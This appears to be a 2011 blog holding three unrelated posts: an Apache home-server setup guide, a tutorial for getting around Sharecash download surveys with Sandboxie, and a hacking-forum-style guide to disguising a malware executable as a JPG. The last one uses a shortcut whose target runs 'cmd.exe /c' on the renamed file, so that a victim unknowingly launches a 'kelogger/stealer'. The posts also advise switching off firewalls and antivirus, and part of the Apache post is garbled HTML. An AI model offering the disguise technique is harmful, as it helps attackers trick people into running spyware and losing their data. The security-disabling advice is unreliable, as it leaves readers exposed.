2011. november 23., szerda

How To Create A HTTP Server At Home

In this post we will see how to create an HTTP server. A web server is software installed on a computer that allows other computers to access specific files on that computer/server. There are many reasons to create your own home servers. For example: file sharing, so you can download files from your home computer from anywhere or you can create a web site on own server etc. Simply said It works like this; You choose a directory on your computer , in that directory add folders, files like music,video and etc. When you put the IP address of your computer the in web browser you can see all the files from that folder and you can download those files. Let’s now create a server(HTTP server!) using Apache(a server client):
1. You must have:
Broadband internet connection always on
Windows on your computer
2. Create a folder on your disc , in this example I created a folder on E:\my server
3. Download apache_2.2.10-win32-x86-no_ssl.msi and install it, set parameters( for localhost type something like a myserver.com(doesn’t really matter), also type your email address in field “Administrator@ Email Address” ) as shown below, choose where you want to install it.


4..When you install Apache , go to directory where you installed it (p.e. “C:\Program Files\Apache Software Foundation\Apache2.2\conf”) , here you will find a httpd file.
Open that file with notepad.


After this will appear notepad with long and complicated code, don´t worry, you must change just 3 things.
5. In notepad file find #DocumentRoot “C:/Program Files/Apache Group/Apache2/htdocs” and replace with #DocumentRoot “E:\my server”. Also find #<="" allowoverride="" and="" any="" apache2="" apache="" appear="" but="" can="" change="" create="" created="" disc="" e:.="" example="" files="" find="" folder="" group="" here.="" htdocs”="" i="" in="" is="" local="" none="" on="" other="" path="" place,="" program="" put="" replace="" server.="" server="" server”.="" span="" that="" then="" this="" to="" type="" where="" which="" will="" with="" you="" your="">

After this, save file like httpd.conf.

6. Type in web addresses http://localhost/ or your IP Address, you should see something like this



Every files you put in folder , which we created in step 2 , will be shown on http://localhost/
7. If you want access own server from other computers. You must forward a port in the router we’re using. The port we need to forward is port number 80. Why? Because by default it’s the port used for HTTP. Port forwarding actually means opening a tunnel through the router so that the router wouldn’t reject the connections that are trying to connect to it. How to port-forward? With every router it’s different. Here are the instructions for every one of them. You must also turn off you firewall.
That is all. Enjoy your home server. If you have questions, post them in the comments area.
Note: Creating home server is risky,when you open port, there is a possibility to have someone a breach in your computer .Before you start, make sure your computer has all the latest patches and security updates, and that you’ve done a thorough spyware and virus scan. This tutorial is only for advanced users



link to download apachehttp://httpd.apache.org/download.cgi

How to download from Sharecash? [Best TuT]

For all the people who have trouble with the surveys on $harecash, here's a way to download that works for me almost every time. This may or may not work on other survey sites.

What you'll need:
  • A VPN if outside the US (Free US VPN + tutorial here, be sure to post a comment saying thanks if you use it)
  • Sandboxie (Download here)
Step 1:
Download and install Sandboxie.
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Step 2:
After installation, the Sandboxie window should come up. Close any prompts that may come up, right click 'Sandbox DefaultBox', and select 'Run Sandboxed>Run Web Browser'. A new window with your default browser will come up.

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If Firefox gives you an error 'Firefox is already running, but is not responding. To open a new window, you must first close the existing Firefox process, or restart your system.', just try opening it through Sandboxie again and it should work. You can tell that Firefox is running sandboxed when you see a pair of '[#]' around the window name in your taskbar.

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Step 3:
Copy and paste your link into the Sandboxed browser. When you see the infamous 'Complete a Quick Survey to Continue!' box, there should be at least one option to download some sort of game or toolbar. A lot of the time they don't go right out and say that it's a download just from the description, but ones that usually don't ask for your opinion/personal info are the download ones. If you're not sure, just click on them to check. I'm going to do the 'Blow up all the balloons' one.
NOTE: I haven't had success with the 'Super Mario Games'.

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Step 4:
On the new page, click the Download or Play Now button for whatever page $harecash sent you to, and download the file.

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If Sandboxie brings a prompt up asking to recover files out of the Sandbox, click 'Close'.

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Protip: If your antivirus is giving you trouble, just disable it. You'll still be safe, as Sandboxie keeps it in a contained environment.

Step 5:
Run the file from the browser and before going on with the installation, ensure that you're running it sandboxed by looking for those '[#]' in the window name like we did before.

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Go on with the installation. I recommend that you uncheck any offers to install software that's unnecessary to going through the installation. It won't hurt anything if you do, but it just takes longer.

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Step 6:
Now that you've completed the installation, a page may open up, and $harecash should detect that you've installed it.

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This time, however, when you download the actual file you were trying to, select 'Recover' when the Sandboxie prompt comes up.

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Step 7:
Now, to clean everything up, we're going to go to the Sandboxie Control, right click, and select 'Delete Contents'. Select 'Delete Contents' on the next prompt and anything in the Sandboxie process tree should close. Now you're clean!

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I hope this helped. And to those who always complain about $harecash, please remember that there are people working hard to make those programs you love, and $harecash is an incentive for them to keep it free.

2011. november 2., szerda

How to run JPG as an EXE

I have searched on this forum and have not found this method anywhere so I decided to post it. Note I have used this method for years and it works on every Windows OS.

Requirements:
Windows
Your EXE.


Step 1 :

First things make a New Folder


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Step 2 :

Place your server .exe inside of the folder
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Step 3 :

Right click and drag your server.exe inside your folder and press "Create Shortcut Here"


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Step 4 :

Making sure that your have extension enabled in Windows then rename your server to something legit like IMG_0163.JPG.


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Step 5 :

Right click on the server.exe Shortcut and go into Properties and change the Target: To the following


"C:\WINDOWS\system32\cmd.exe /c IMG_0163.jpg"
*Note* Put whatever the filename you have is where I put the "IMG_0163.jpg"


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Step 6 :

While in the shortcut properties click Change Icon and look for an .ico file that is the same exact as your .JPG file


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Step 7 :

Finally Rename your shortcut to another .JPG file like IMG_0164.JPG


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Conclusion + Things to note

Now when you run your shortcut file it will automatically run the select JPG as an EXE. However an ugly CMD box will pop up which makes it a bit obvious. But at this point it is already too late because your server/kelogger/stealer is already running on their system. This is how it looks in the task manager so you could see its the actual JPG running.


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The slave has to run the Shortcut so that the JPG would run